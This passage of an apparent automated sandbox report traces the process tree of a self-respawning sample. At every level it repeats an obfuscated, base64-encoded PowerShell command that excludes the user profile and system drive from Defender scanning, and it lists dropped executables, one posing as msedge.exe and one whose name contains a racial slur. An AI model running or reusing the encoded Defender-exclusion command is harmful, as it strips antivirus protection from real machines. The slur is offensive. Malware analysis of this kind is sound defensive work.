        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        26⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        26⤵
        Loads dropped DLL
        
        PID:2588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        27⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        27⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        28⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        28⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        28⤵
        Loads dropped DLL
        
        PID:1004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        29⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        29⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        30⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        30⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        30⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        31⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        31⤵
        Loads dropped DLL
        
        PID:1720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        32⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:272
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        32⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        32⤵
        Loads dropped DLL
        
        PID:2872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        33⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        33⤵
        Loads dropped DLL
        
        PID:1136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        34⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        34⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        34⤵
        Loads dropped DLL
        
        PID:2792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        35⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        35⤵
        Executes dropped EXE
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        35⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        36⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        36⤵
        Executes dropped EXE
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        36⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        37⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        37⤵
        Executes dropped EXE
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        37⤵
        Loads dropped DLL
        
        PID:3092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        38⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        38⤵
        Executes dropped EXE
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        38⤵
        Loads dropped DLL
        
        PID:3176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        39⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        39⤵
        Executes dropped EXE
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        39⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        40⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3376
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        40⤵
        Executes dropped EXE
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        40⤵
        Loads dropped DLL
        
        PID:3444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        41⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        41⤵
        Executes dropped EXE
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        41⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        42⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        42⤵
        Executes dropped EXE
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        42⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        43⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        43⤵
        Executes dropped EXE
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        43⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        44⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        44⤵
        Executes dropped EXE
        
        PID:3932
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        44⤵
        Loads dropped DLL
        
        PID:3952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        45⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        45⤵
        Executes dropped EXE
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        45⤵
        Loads dropped DLL
        
        PID:2684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        46⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        46⤵
        Executes dropped EXE
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        46⤵
        Loads dropped DLL
        
        PID:2124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        47⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        47⤵
        Executes dropped EXE
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        47⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        48⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        48⤵
        Executes dropped EXE
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        48⤵
        Loads dropped DLL
        
        PID:2640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        49⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        49⤵
        Executes dropped EXE
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        49⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        50⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        50⤵
        Executes dropped EXE
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        50⤵
        Loads dropped DLL
        
        PID:3860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
